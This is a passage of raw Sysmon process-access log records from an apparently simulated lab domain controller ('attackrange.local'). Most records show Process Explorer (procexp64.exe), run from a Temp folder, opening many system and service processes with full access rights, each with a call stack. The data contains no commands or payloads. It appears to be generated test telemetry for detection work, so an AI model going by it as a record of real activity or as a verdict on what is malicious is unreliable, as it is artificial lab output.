15:16:27.064{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:28.080{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 